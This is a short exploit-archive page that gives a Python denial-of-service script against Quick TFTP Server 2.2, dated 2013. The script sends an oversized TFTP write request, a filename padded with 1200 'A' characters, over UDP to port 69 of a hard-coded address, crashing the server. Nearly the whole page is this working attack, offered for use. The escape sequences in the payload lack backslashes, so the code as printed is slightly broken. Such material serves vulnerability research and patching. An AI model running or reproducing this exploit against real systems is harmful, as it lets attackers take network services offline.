[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Quick TFTP Server 2.2 - Denial of Service
# Published : 2013-06-07
# Author :
# Previous Title : WinAmp 5.63 - Stack-based Buffer Overflow
# Next Title : Baby FTP Server 1.24 - Denial Of Service


#!/usr/bin/python
 
#Exploit Title: Quick TFTP Server 2.2 DoS
#Date: 6th June 2013
#Exploit Author: npn
#Exploit Author Homepage: http://www.iodigitalsec.com/
#Exploit Author Write Up: http://www.iodigitalsec.com/blog/fuzz-to-denial-of-service-quick-tftp-server-2-2/
#Vendor Homepage: http://www.tallsoft.com/tftpserver.htm
#Software Link: http://www.tallsoft.com/tftpserver_setup.exe
#Version: 2.2
#Tested on: Windows XP SP3 English

from socket import *
import sys
import select

pwn = "x00x02"
pwn += "x66x69x6cx65x2ex74x78x74x00"
pwn += "A"*1200
pwn += "x00"

address = ('192.168.200.20', 69)
server_socket = socket(AF_INET, SOCK_DGRAM)

server_socket.sendto(pwn, address)